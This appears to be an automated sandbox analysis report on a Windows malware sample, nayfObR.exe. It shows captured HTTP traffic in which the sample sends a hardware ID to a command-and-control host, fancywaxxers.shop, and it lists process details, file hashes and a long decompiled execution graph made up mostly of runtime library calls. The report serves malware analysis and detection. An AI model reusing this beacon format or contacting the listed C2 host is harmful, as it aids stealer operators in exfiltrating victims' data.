                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                          Content-Length: 80
                                                                                          Host: fancywaxxers.shop
                                                                                          2025-01-03 13:34:15 UTC80OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 37 74 78 32 6a 6f 2d 2d 35 31 36 26 6a 3d 26 68 77 69 64 3d 35 30 33 37 37 44 34 33 34 31 45 46 33 35 43 42 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36
                                                                                          Data Ascii: act=get_message&ver=4.0&lid=7tx2jo--516&j=&hwid=50377D4341EF35CB822D1F4978021086
                                                                                          2025-01-03 13:34:16 UTC1129INHTTP/1.1 200 OK
                                                                                          Date: Fri, 03 Jan 2025 13:34:16 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Set-Cookie: PHPSESSID=5439pr99u98q5vo9khteia4ebk; expires=Tue, 29 Apr 2025 07:20:54 GMT; Max-Age=9999999; path=/
                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-XSS-Protection: 1; mode=block
                                                                                          cf-cache-status: DYNAMIC
                                                                                          vary: accept-encoding
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gqjfX6YDYuYV69we2hdu6HF0p9e7YswQ%2B1rUyYU0yxlyx7x4bbU%2Buh3CTJbiYfi7Y1sEzYOcAMNEvob62D1uPOS2iqxbcON7R%2FH2Jd2bqNa676DVNR7Fdq0MJq317HWH9JT1rg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fc35d840fd972b9-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1788&min_rtt=1786&rtt_var=674&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=981&delivery_rate=1616832&cwnd=214&unsent_bytes=0&cid=3ed65f2568b95b74&ts=444&x=0"
                                                                                          2025-01-03 13:34:16 UTC54INData Raw: 33 30 0d 0a 33 77 65 66 68 48 53 79 30 32 39 4b 41 33 30 4d 6c 61 61 63 6a 53 41 44 37 6d 32 57 31 75 49 7a 68 30 69 2b 52 4b 79 79 4d 44 4b 45 57 67 3d 3d 0d 0a
                                                                                          Data Ascii: 303wefhHSy029KA30MlaacjSAD7m2W1uIzh0i+RKyyMDKEWg==
                                                                                          2025-01-03 13:34:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Click to jump to process

                                                                                          Click to jump to process

                                                                                          Click to dive into process behavior distribution

                                                                                          Click to jump to process

                                                                                          Target ID:0
                                                                                          Start time:08:33:55
                                                                                          Start date:03/01/2025
                                                                                          Path:C:\Users\user\Desktop\nayfObR.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\nayfObR.exe"
                                                                                          Imagebase:0x5a0000
                                                                                          File size:535'040 bytes
                                                                                          MD5 hash:138FCF999A87419BE2C7E5E036601466
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Target ID:1
                                                                                          Start time:08:33:55
                                                                                          Start date:03/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6d64d0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:3
                                                                                          Start time:08:33:55
                                                                                          Start date:03/01/2025
                                                                                          Path:C:\Users\user\Desktop\nayfObR.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\nayfObR.exe"
                                                                                          Imagebase:0x5a0000
                                                                                          File size:535'040 bytes
                                                                                          MD5 hash:138FCF999A87419BE2C7E5E036601466
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Reset < >

                                                                                            Execution Graph

                                                                                            Execution Coverage:7.3%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:6%
                                                                                            Total number of Nodes:2000
                                                                                            Total number of Limit Nodes:32
                                                                                            execution_graph 18438 5a9c50 18439 5a9c58 18438->18439 18457 5b1a81 18439->18457 18441 5a9c63 18464 5a6fab 18441->18464 18443 5a9643 4 API calls 18444 5a9cfa 18443->18444 18445 5a9c78 __RTC_Initialize 18455 5a9cd5 18445->18455 18470 5a6e24 18445->18470 18447 5a9c91 18473 5b0838 18447->18473 18451 5a9ca7 18506 5a9f73 18451->18506 18453 5a9cca 18512 5af178 18453->18512 18455->18443 18456 5a9cf2 18455->18456 18458 5b1ab3 18457->18458 18459 5b1a90 18457->18459 18458->18441 18459->18458 18460 5b0ee4 __strnicoll 14 API calls 18459->18460 18461 5b1aa3 18460->18461 18462 5b15cf __strnicoll 29 API calls 18461->18462 18463 5b1aae 18462->18463 18463->18441 18465 5a6fbb 18464->18465 18466 5a6fb7 18464->18466 18467 5a6fc8 ___scrt_release_startup_lock 18465->18467 18468 5a9643 4 API calls 18465->18468 18466->18445 18467->18445 18469 5a7031 18468->18469 18519 5a6e39 18470->18519 18474 5b0892 18473->18474 18475 5b08ca 18474->18475 18476 5b08b4 18474->18476 18497 5a9c9c 18474->18497 18477 5b6b60 50 API calls 18475->18477 18478 5b0ee4 __strnicoll 14 API calls 18476->18478 18479 5b08d0 18477->18479 18480 5b08b9 18478->18480 18554 5bb338 GetModuleFileNameW 18479->18554 18482 5b15cf __strnicoll 29 API calls 18480->18482 18482->18497 18488 5b0938 18491 5b09cf 39 API calls 18488->18491 18489 5b092c 18490 5b0ee4 __strnicoll 14 API calls 18489->18490 18492 5b0931 18490->18492 18493 5b094e 18491->18493 18495 5b4fb7 ___free_lconv_mon 14 API calls 18492->18495 18493->18492 18494 5b0972 18493->18494 18576 5bacb2 18494->18576 18495->18497 18497->18455 18505 5a9f58 InitializeSListHead 18497->18505 18499 5b0989 18501 5b4fb7 ___free_lconv_mon 14 API calls 18499->18501 18500 5b0993 18503 5b4fb7 ___free_lconv_mon 14 API calls 18500->18503 18502 5b0991 18501->18502 18504 5b4fb7 ___free_lconv_mon 14 API calls 18502->18504 18503->18502 18504->18497 18505->18451 18803 5b0b43 18506->18803 18508 5a9f84 18509 5a9f8b 18508->18509 18510 5a9643 4 API calls 18508->18510 18509->18453 18511 5a9f93 18510->18511 18513 5b524a __Getctype 39 API calls 18512->18513 18514 5af183 18513->18514 18515 5b0ee4 __strnicoll 14 API calls 18514->18515 18518 5af1bb 18514->18518 18516 5af1b0 18515->18516 18517 5b15cf __strnicoll 29 API calls 18516->18517 18517->18518 18518->18455 18520 5a6e48 18519->18520 18521 5a6e4f 18519->18521 18525 5b0c3c 18520->18525 18528 5b0bcb 18521->18528 18524 5a6e2f 18524->18447 18526 5b0bcb std::ios_base::_Init 32 API calls 18525->18526 18527 5b0c4e 18526->18527 18527->18524 18531 5b0e2e 18528->18531 18532 5b0e3a ___scrt_is_nonwritable_in_current_image 18531->18532 18539 5b18e1 EnterCriticalSection 18532->18539 18534 5b0e48 18540 5b0c52 18534->18540 18536 5b0e55 18550 5b0e7d 18536->18550 18539->18534 18541 5b0ce0 std::_Lockit::_Lockit 18540->18541 18542 5b0c6d 18540->18542 18541->18536 18542->18541 18543 5bb965 std::ios_base::_Init 32 API calls 18542->18543 18549 5b0cc0 18542->18549 18545 5b0cb6 18543->18545 18544 5bb965 std::ios_base::_Init 32 API calls 18546 5b0cd6 18544->18546 18548 5b4fb7 ___free_lconv_mon 14 API calls 18545->18548 18547 5b4fb7 ___free_lconv_mon 14 API calls 18546->18547 18547->18541 18548->18549 18549->18541 18549->18544 18553 5b18f8 LeaveCriticalSection 18550->18553 18552 5b0bfc 18552->18524 18553->18552 18555 5bb378 18554->18555 18556 5bb367 GetLastError 18554->18556 18558 5b62b5 39 API calls 18555->18558 18557 5b0f0a __dosmaperr 14 API calls 18556->18557 18561 5bb373 18557->18561 18559 5bb3a9 18558->18559 18602 5ac5e2 18559->18602 18562 5a6d61 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 18561->18562 18563 5b08e3 18562->18563 18564 5b09cf 18563->18564 18566 5b09f5 18564->18566 18568 5b0a53 18566->18568 18630 5bb3d9 18566->18630 18567 5b0916 18570 5b0843 18567->18570 18568->18567 18569 5bb3d9 39 API calls 18568->18569 18569->18568 18571 5b0886 18570->18571 18572 5b0854 18570->18572 18571->18488 18571->18489 18572->18571 18573 5b62f4 __Getctype 14 API calls 18572->18573 18574 5b087d 18573->18574 18575 5b4fb7 ___free_lconv_mon 14 API calls 18574->18575 18575->18571 18577 5bacf9 18576->18577 18578 5bad09 18577->18578 18587 5bad1f 18577->18587 18579 5b0ee4 __strnicoll 14 API calls 18578->18579 18580 5bad0e 18579->18580 18581 5b15cf __strnicoll 29 API calls 18580->18581 18595 5b0981 18581->18595 18582 5bad8a 18582->18582 18583 5b0843 14 API calls 18582->18583 18585 5badcd 18583->18585 18588 5badd6 18585->18588 18596 5badec 18585->18596 18587->18582 18589 5bad9e 18587->18589 18636 5bafe8 18587->18636 18688 5bb099 18587->18688 18590 5b4fb7 ___free_lconv_mon 14 API calls 18588->18590 18724 5baf3c 18589->18724 18590->18589 18591 5bae4c 18592 5b4fb7 ___free_lconv_mon 14 API calls 18591->18592 18594 5bae59 18592->18594 18597 5baf3c 14 API calls 18594->18597 18595->18499 18595->18500 18596->18591 18596->18596 18599 5bae69 18596->18599 18730 5bfc83 18596->18730 18597->18595 18600 5b15fc __Getctype 11 API calls 18599->18600 18601 5bae75 18600->18601 18603 5ac5fe 18602->18603 18604 5ac5ef 18602->18604 18605 5ac62b 18603->18605 18606 5ac606 18603->18606 18604->18561 18607 5b5101 _Fputc WideCharToMultiByte 18605->18607 18606->18604 18623 5ac4d1 18606->18623 18608 5ac63b 18607->18608 18610 5ac658 18608->18610 18611 5ac642 GetLastError 18608->18611 18613 5ac669 18610->18613 18615 5ac4d1 14 API calls 18610->18615 18612 5b0f0a __dosmaperr 14 API calls 18611->18612 18614 5ac64e 18612->18614 18613->18604 18627 5ac5be 18613->18627 18617 5b0ee4 __strnicoll 14 API calls 18614->18617 18615->18613 18617->18604 18619 5ac683 GetLastError 18620 5b0f0a __dosmaperr 14 API calls 18619->18620 18621 5ac68f 18620->18621 18622 5b0ee4 __strnicoll 14 API calls 18621->18622 18622->18604 18624 5ac4dc 18623->18624 18625 5b0ee4 __strnicoll 14 API calls 18624->18625 18626 5ac4e5 18625->18626 18626->18604 18628 5b5101 _Fputc WideCharToMultiByte 18627->18628 18629 5ac5db 18628->18629 18629->18604 18629->18619 18633 5bb3f1 18630->18633 18634 5ac3ba __strnicoll 39 API calls 18633->18634 18635 5bb3ec 18634->18635 18635->18566 18637 5baff4 18636->18637 18637->18637 18638 5bb00d 18637->18638 18639 5b62f4 __Getctype 14 API calls 18637->18639 18638->18587 18640 5bb022 18639->18640 18641 5bb035 18640->18641 18642 5bfc83 29 API calls 18640->18642 18643 5bfc83 29 API calls 18641->18643 18645 5bb08c 18641->18645 18642->18641 18644 5bb04e 18643->18644 18644->18645 18646 5bb055 18644->18646 18648 5b15fc __Getctype 11 API calls 18645->18648 18739 5baf61 18646->18739 18653 5bb098 18648->18653 18650 5bb06e 18654 5b4fb7 ___free_lconv_mon 14 API calls 18650->18654 18651 5bb0e0 18655 5bb10c 18651->18655 18656 5bb0f9 18651->18656 18652 5b4fb7 ___free_lconv_mon 14 API calls 18652->18650 18653->18651 18750 5c22c0 18653->18750 18654->18638 18658 5b62b5 39 API calls 18655->18658 18657 5bafe8 47 API calls 18656->18657 18687 5bb104 18657->18687 18660 5bb160 18658->18660 18662 5ac4b4 17 API calls 18660->18662 18661 5a6d61 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 18663 5bb31c 18661->18663 18664 5bb16e FindFirstFileExW 18662->18664 18663->18587 18665 5bb196 18664->18665 18672 5bb1c4 18664->18672 18687->18661 18689 5bb0e0 18688->18689 18692 5bb0c3 18688->18692 18690 5bb10c 18689->18690 18691 5bb0f9 18689->18691 18694 5b62b5 39 API calls 18690->18694 18693 5bafe8 51 API calls 18691->18693 18692->18689 18695 5c22c0 39 API calls 18692->18695 18723 5bb104 18693->18723 18696 5bb160 18694->18696 18695->18692 18698 5ac4b4 17 API calls 18696->18698 18697 5a6d61 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 18699 5bb31c 18697->18699 18700 5bb16e FindFirstFileExW 18698->18700 18699->18587 18701 5bb196 18700->18701 18708 5bb1c4 18700->18708 18702 5bafe8 51 API calls 18701->18702 18703 5bb1a4 18702->18703 18706 5b4fb7 ___free_lconv_mon 14 API calls 18703->18706 18703->18723 18704 5b62b5 39 API calls 18704->18708 18705 5bae76 18 API calls 18705->18708 18706->18723 18707 5bafe8 51 API calls 18707->18708 18708->18704 18708->18705 18708->18707 18709 5bb275 FindNextFileW 18708->18709 18710 5bb2da 18708->18710 18711 5b4fb7 ___free_lconv_mon 14 API calls 18708->18711 18709->18708 18712 5bb28b 18709->18712 18713 5bb2ee FindClose 18710->18713 18717 5b4fb7 ___free_lconv_mon 14 API calls 18710->18717 18711->18708 18714 5bb2bb FindClose 18712->18714 18715 5c1d90 29 API calls 18712->18715 18718 5bb2fd 18713->18718 18713->18723 18716 5bb2ca 18714->18716 18714->18723 18719 5bb2b8 18715->18719 18720 5b4fb7 ___free_lconv_mon 14 API calls 18716->18720 18721 5bb2ed 18717->18721 18722 5b4fb7 ___free_lconv_mon 14 API calls 18718->18722 18719->18714 18720->18723 18721->18713 18722->18723 18723->18697 18725 5baf46 18724->18725 18726 5baf56 18725->18726 18728 5b4fb7 ___free_lconv_mon 14 API calls 18725->18728 18727 5b4fb7 ___free_lconv_mon 14 API calls 18726->18727 18729 5baf5d 18727->18729 18728->18725 18729->18595 18734 5bfc8e 18730->18734 18731 5bfca8 18732 5bfcbc 18731->18732 18733 5b0ee4 __strnicoll 14 API calls 18731->18733 18732->18596 18735 5bfcb2 18733->18735 18734->18731 18734->18732 18737 5bfce1 18734->18737 18736 5b15cf __strnicoll 29 API calls 18735->18736 18736->18732 18737->18732 18738 5b0ee4 __strnicoll 14 API calls 18737->18738 18738->18735 18740 5baf73 18739->18740 18749 5baf6f 18739->18749 18741 5baf78 18740->18741 18742 5baf9e 18740->18742 18743 5b62f4 __Getctype 14 API calls 18741->18743 18745 5bb965 std::ios_base::_Init 32 API calls 18742->18745 18742->18749 18744 5baf81 18743->18744 18746 5b4fb7 ___free_lconv_mon 14 API calls 18744->18746 18747 5bafbe 18745->18747 18746->18749 18748 5b4fb7 ___free_lconv_mon 14 API calls 18747->18748 18748->18749 18749->18650 18749->18652 18784 5c22d7 18750->18784 18752 5c22d2 18752->18653 18785 5c22f9 18784->18785 18786 5c22e5 18784->18786 18787 5c2301 18785->18787 18788 5c2313 18785->18788 18789 5b0ee4 __strnicoll 14 API calls 18786->18789 18790 5b0ee4 __strnicoll 14 API calls 18787->18790 18794 5ac3ba __strnicoll 39 API calls 18788->18794 18797 5c2311 18788->18797 18791 5c22ea 18789->18791 18793 5c2306 18790->18793 18792 5b15cf __strnicoll 29 API calls 18791->18792 18795 5c22f5 18792->18795 18796 5b15cf __strnicoll 29 API calls 18793->18796 18794->18797 18795->18752 18796->18797 18797->18752 18804 5b0b61 18803->18804 18808 5b0b81 18803->18808 18805 5b0ee4 __strnicoll 14 API calls 18804->18805 18806 5b0b77 18805->18806 18807 5b15cf __strnicoll 29 API calls 18806->18807 18807->18808 18808->18508 20390 5b6941 20391 5b695c ___scrt_is_nonwritable_in_current_image 20390->20391 20402 5b18e1 EnterCriticalSection 20391->20402 20393 5b6963 20403 5bc87a 20393->20403 20396 5b6981 20422 5b69a7 20396->20422 20401 5b6a92 2 API calls 20401->20396 20402->20393 20404 5bc886 ___scrt_is_nonwritable_in_current_image 20403->20404 20405 5bc88f 20404->20405 20406 5bc8b0 20404->20406 20408 5b0ee4 __strnicoll 14 API calls 20405->20408 20425 5b18e1 EnterCriticalSection 20406->20425 20409 5bc894 20408->20409 20410 5b15cf __strnicoll 29 API calls 20409->20410 20411 5b6972 20410->20411 20411->20396 20416 5b69dc GetStartupInfoW 20411->20416 20412 5bc8e8 20433 5bc90f 20412->20433 20413 5bc8bc 20413->20412 20426 5bc7ca 20413->20426 20417 5b69f9 20416->20417 20418 5b697c 20416->20418 20417->20418 20419 5bc87a 30 API calls 20417->20419 20418->20401 20420 5b6a21 20419->20420 20420->20418 20421 5b6a51 GetFileType 20420->20421 20421->20420 20437 5b18f8 LeaveCriticalSection 20422->20437 20424 5b6992 20425->20413 20427 5b62f4 __Getctype 14 API calls 20426->20427 20429 5bc7dc 20427->20429 20428 5bc7e9 20430 5b4fb7 ___free_lconv_mon 14 API calls 20428->20430 20429->20428 20432 5b5d70 6 API calls 20429->20432 20431 5bc83e 20430->20431 20431->20413 20432->20429 20436 5b18f8 LeaveCriticalSection 20433->20436 20435 5bc916 20435->20411 20436->20435 20437->20424 19189 5ace10 19190 5b1d4a ___scrt_uninitialize_crt 68 API calls 19189->19190 19191 5ace18 19190->19191 19199 5b77f2 19191->19199 19193 5ace1d 19209 5b789d 19193->19209 19196 5ace47 19197 5b4fb7 ___free_lconv_mon 14 API calls 19196->19197 19198 5ace52 19197->19198 19200 5b77fe ___scrt_is_nonwritable_in_current_image 19199->19200 19213 5b18e1 EnterCriticalSection 19200->19213 19202 5b7875 19218 5b7894 19202->19218 19204 5b7809 19204->19202 19205 5b7849 DeleteCriticalSection 19204->19205 19214 5b1ba2 19204->19214 19208 5b4fb7 ___free_lconv_mon 14 API calls 19205->19208 19208->19204 19210 5ace2c DeleteCriticalSection 19209->19210 19211 5b78b4 19209->19211 19210->19193 19210->19196 19211->19210 19212 5b4fb7 ___free_lconv_mon 14 API calls 19211->19212 19212->19210 19213->19204 19215 5b1bb5 _Fputc 19214->19215 19221 5b1c60 19215->19221 19217 5b1bc1 _Fputc 19217->19204 19293 5b18f8 LeaveCriticalSection 19218->19293 19220 5b7881 19220->19193 19222 5b1c6c ___scrt_is_nonwritable_in_current_image 19221->19222 19223 5b1c99 19222->19223 19224 5b1c76 19222->19224 19231 5b1c91 19223->19231 19232 5acd0f EnterCriticalSection 19223->19232 19225 5b1778 _Fputc 29 API calls 19224->19225 19225->19231 19227 5b1cb7 19233 5b1bd2 19227->19233 19229 5b1cc4 19247 5b1cef 19229->19247 19231->19217 19232->19227 19234 5b1bdf 19233->19234 19235 5b1c02 19233->19235 19236 5b1778 _Fputc 29 API calls 19234->19236 19237 5b1db8 ___scrt_uninitialize_crt 64 API calls 19235->19237 19246 5b1bfa 19235->19246 19236->19246 19238 5b1c1a 19237->19238 19239 5b789d 14 API calls 19238->19239 19240 5b1c22 19239->19240 19241 5b8744 _Ungetc 29 API calls 19240->19241 19242 5b1c2e 19241->19242 19250 5bca16 19242->19250 19245 5b4fb7 ___free_lconv_mon 14 API calls 19245->19246 19246->19229 19292 5acd23 LeaveCriticalSection 19247->19292 19249 5b1cf5 19249->19231 19252 5bca3f 19250->19252 19254 5b1c35 19250->19254 19251 5bca8e 19253 5b1778 _Fputc 29 API calls 19251->19253 19252->19251 19255 5bca66 19252->19255 19253->19254 19254->19245 19254->19246 19257 5bcab9 19255->19257 19258 5bcac5 ___scrt_is_nonwritable_in_current_image 19257->19258 19265 5bc918 EnterCriticalSection 19258->19265 19260 5bcad3 19261 5bcb04 19260->19261 19266 5bc976 19260->19266 19279 5bcb3e 19261->19279 19265->19260 19267 5bc6cf _Fputc 29 API calls 19266->19267 19270 5bc986 19267->19270 19268 5bc98c 19282 5bc739 19268->19282 19270->19268 19271 5bc6cf _Fputc 29 API calls 19270->19271 19278 5bc9be 19270->19278 19273 5bc9b5 19271->19273 19272 5bc6cf _Fputc 29 API calls 19274 5bc9ca CloseHandle 19272->19274 19276 5bc6cf _Fputc 29 API calls 19273->19276 19274->19268 19275 5bc9d6 GetLastError 19274->19275 19275->19268 19276->19278 19277 5bc9e4 _Fputc 19277->19261 19278->19268 19278->19272 19291 5bc93b LeaveCriticalSection 19279->19291 19281 5bcb27 19281->19254 19283 5bc748 19282->19283 19284 5bc7af 19282->19284 19283->19284 19290 5bc772 19283->19290 19285 5b0ee4 __strnicoll 14 API calls 19284->19285 19286 5bc7b4 19285->19286 19287 5b0ef7 __dosmaperr 14 API calls 19286->19287 19288 5bc79f 19287->19288 19288->19277 19289 5bc799 SetStdHandle 19289->19288 19290->19288 19290->19289 19291->19281 19292->19249 19293->19220 20674 5b6f00 20677 5b18f8 LeaveCriticalSection 20674->20677 20676 5b6f07 20677->20676 19403 5a8230 19404 5a824b 19403->19404 19406 5a825d 19404->19406 19407 5a7c21 19404->19407 19410 5b365e 19407->19410 19411 5b366a ___scrt_is_nonwritable_in_current_image 19410->19411 19412 5b3688 19411->19412 19413 5b3671 19411->19413 19423 5acd0f EnterCriticalSection 19412->19423 19414 5b0ee4 __strnicoll 14 API calls 19413->19414 19416 5b3676 19414->19416 19418 5b15cf __strnicoll 29 API calls 19416->19418 19417 5b3697 19424 5b36dc 19417->19424 19421 5a7c33 19418->19421 19420 5b36a5 19438 5b36d4 19420->19438 19421->19406 19423->19417 19425 5b36f2 19424->19425 19431 5b377c _Ungetc 19424->19431 19426 5b3720 19425->19426 19425->19431 19441 5bf0bf 19425->19441 19428 5b8744 _Ungetc 29 API calls 19426->19428 19426->19431 19429 5b3732 19428->19429 19430 5b3755 19429->19430 19432 5b8744 _Ungetc 29 API calls 19429->19432 19430->19431 19446 5b3792 19430->19446 19431->19420 19433 5b373e 19432->19433 19433->19430 19435 5b8744 _Ungetc 29 API calls 19433->19435 19436 5b374a 19435->19436 19437 5b8744 _Ungetc 29 API calls 19436->19437 19437->19430 19473 5acd23 LeaveCriticalSection 19438->19473 19440 5b36da 19440->19421 19442 5b62f4 __Getctype 14 API calls 19441->19442 19443 5bf0dc 19442->19443 19444 5b4fb7 ___free_lconv_mon 14 API calls 19443->19444 19445 5bf0e6 19444->19445 19445->19426 19447 5b8744 _Ungetc 29 API calls 19446->19447 19448 5b37b5 19447->19448 19449 5b8744 _Ungetc 29 API calls 19448->19449 19456 5b37de 19448->19456 19451 5b37c3 19449->19451 19450 5b3818 19457 5a6d61 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 19450->19457 19453 5b8744 _Ungetc 29 API calls 19451->19453 19451->19456 19454 5b37d1 19453->19454 19455 5b8744 _Ungetc 29 API calls 19454->19455 19455->19456 19456->19450 19459 5b8436 19456->19459 19458 5b3896 19457->19458 19458->19431 19460 5b8449 _Fputc 19459->19460 19463 5b8470 19460->19463 19462 5b845e _Fputc 19462->19450 19464 5b8485 19463->19464 19465 5b84c6 19464->19465 19466 5ad190 _Fputc 39 API calls 19464->19466 19470 5b8489 _Fputc std::bad_exception::bad_exception 19464->19470 19472 5b84b2 std::bad_exception::bad_exception 19464->19472 19468 5b5101 _Fputc WideCharToMultiByte 19465->19468 19465->19470 19465->19472 19466->19465 19467 5b1778 _Fputc 29 API calls 19467->19470 19469 5b8581 19468->19469 19469->19470 19471 5b8597 GetLastError 19469->19471 19470->19462 19471->19470 19471->19472 19472->19467 19472->19470 19473->19440 20694 5a8330 20695 5a833c __EH_prolog3_GS 20694->20695 20697 5a83a8 20695->20697 20698 5a838e 20695->20698 20702 5a8356 20695->20702 20713 5b205a 20697->20713 20710 5a7bdd 20698->20710 20737 5a998e 20702->20737 20704 5a6290 std::ios_base::_Init 29 API calls 20704->20702 20705 5a8464 20705->20704 20706 5a83c7 20706->20705 20708 5b205a 45 API calls 20706->20708 20709 5a849e 20706->20709 20733 5a771b 20706->20733 20708->20706 20709->20705 20740 5b34f7 20709->20740 20753 5b2215 20710->20753 20714 5b2066 ___scrt_is_nonwritable_in_current_image 20713->20714 20715 5b2088 20714->20715 20716 5b2070 20714->20716 21031 5acd0f EnterCriticalSection 20715->21031 20717 5b0ee4 __strnicoll 14 API calls 20716->20717 20719 5b2075 20717->20719 20721 5b15cf __strnicoll 29 API calls 20719->20721 20720 5b2093 20722 5b8744 _Ungetc 29 API calls 20720->20722 20723 5b20ab 20720->20723 20732 5b2080 20721->20732 20722->20723 20724 5b213b 20723->20724 20725 5b2113 20723->20725 21032 5b2173 20724->21032 20727 5b0ee4 __strnicoll 14 API calls 20725->20727 20729 5b2118 20727->20729 20728 5b2141 21042 5b216b 20728->21042 20730 5b15cf __strnicoll 29 API calls 20729->20730 20730->20732 20732->20706 20734 5a774f 20733->20734 20736 5a772b 20733->20736 21046 5a8bbf 20734->21046 20736->20706 20738 5a6d61 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20737->20738 20739 5a9998 20738->20739 20739->20739 20741 5b3503 ___scrt_is_nonwritable_in_current_image 20740->20741 20742 5b350a 20741->20742 20743 5b351f 20741->20743 20744 5b0ee4 __strnicoll 14 API calls 20742->20744 21057 5acd0f EnterCriticalSection 20743->21057 20746 5b350f 20744->20746 20748 5b15cf __strnicoll 29 API calls 20746->20748 20747 5b3529 21058 5b356a 20747->21058 20751 5b351a 20748->20751 20751->20709 20754 5b2221 ___scrt_is_nonwritable_in_current_image 20753->20754 20755 5b2228 20754->20755 20756 5b223f 20754->20756 20757 5b0ee4 __strnicoll 14 API calls 20755->20757 20766 5acd0f EnterCriticalSection 20756->20766 20759 5b222d 20757->20759 20762 5b15cf __strnicoll 29 API calls 20759->20762 20760 5b224b 20767 5b228c 20760->20767 20764 5a7be8 20762->20764 20764->20702 20766->20760 20768 5b22a9 20767->20768 20769 5b230f 20767->20769 20770 5b8744 _Ungetc 29 API calls 20768->20770 20771 5b23d6 20769->20771 20773 5b8744 _Ungetc 29 API calls 20769->20773 20772 5b22af 20770->20772 20803 5b2256 20771->20803 20827 5bd77e 20771->20827 20776 5b8744 _Ungetc 29 API calls 20772->20776 20791 5b22d2 20772->20791 20775 5b2324 20773->20775 20777 5b8744 _Ungetc 29 API calls 20775->20777 20795 5b2347 20775->20795 20779 5b22bb 20776->20779 20780 5b2330 20777->20780 20778 5b235e 20781 5b21af 43 API calls 20778->20781 20782 5b8744 _Ungetc 29 API calls 20779->20782 20779->20791 20786 5b8744 _Ungetc 29 API calls 20780->20786 20780->20795 20784 5b2367 20781->20784 20785 5b22c7 20782->20785 20784->20803 20818 5ace8f 20784->20818 20788 5b8744 _Ungetc 29 API calls 20785->20788 20789 5b233c 20786->20789 20787 5b22ed 20787->20803 20807 5b21af 20787->20807 20788->20791 20792 5b8744 _Ungetc 29 API calls 20789->20792 20791->20769 20791->20787 20792->20795 20794 5b23a9 20823 5b85da 20794->20823 20795->20771 20795->20778 20796 5b21af 43 API calls 20798 5b2390 20796->20798 20798->20794 20800 5b2396 20798->20800 20799 5b23bd 20802 5b0ee4 __strnicoll 14 API calls 20799->20802 20799->20803 20801 5b34f7 31 API calls 20800->20801 20801->20803 20802->20803 20804 5b2284 20803->20804 21030 5acd23 LeaveCriticalSection 20804->21030 20806 5b228a 20806->20764 20808 5b2173 20807->20808 20809 5b217f 20808->20809 20810 5b2194 20808->20810 20811 5b0ee4 __strnicoll 14 API calls 20809->20811 20812 5b21a3 20810->20812 20848 5bd773 20810->20848 20813 5b2184 20811->20813 20812->20787 20815 5b15cf __strnicoll 29 API calls 20813->20815 20817 5b218f 20815->20817 20817->20787 20819 5b524a __Getctype 39 API calls 20818->20819 20820 5ace9a 20819->20820 20821 5b582e __Getctype 39 API calls 20820->20821 20822 5aceaa 20821->20822 20822->20794 20822->20796 20824 5b85ed _Fputc 20823->20824 21011 5b8611 20824->21011 20826 5b85ff _Fputc 20826->20799 20828 5bd918 20827->20828 20829 5bd93c 20828->20829 20830 5bd927 20828->20830 20834 5bd99a 20829->20834 20835 5bf0bf _Ungetc 14 API calls 20829->20835 20842 5bd937 20829->20842 20831 5b0ee4 __strnicoll 14 API calls 20830->20831 20832 5bd92c 20831->20832 20833 5b15cf __strnicoll 29 API calls 20832->20833 20833->20842 20836 5b8744 _Ungetc 29 API calls 20834->20836 20835->20834 20837 5bd9ca 20836->20837 20838 5c2923 43 API calls 20837->20838 20839 5bd9d2 20838->20839 20840 5b8744 _Ungetc 29 API calls 20839->20840 20839->20842 20841 5bda0c 20840->20841 20841->20842 20843 5b8744 _Ungetc 29 API calls 20841->20843 